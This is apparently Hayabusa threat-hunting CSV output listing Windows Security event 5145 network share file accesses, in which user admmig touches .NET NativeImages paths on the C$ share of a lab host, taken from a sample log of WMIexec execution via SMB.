10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 
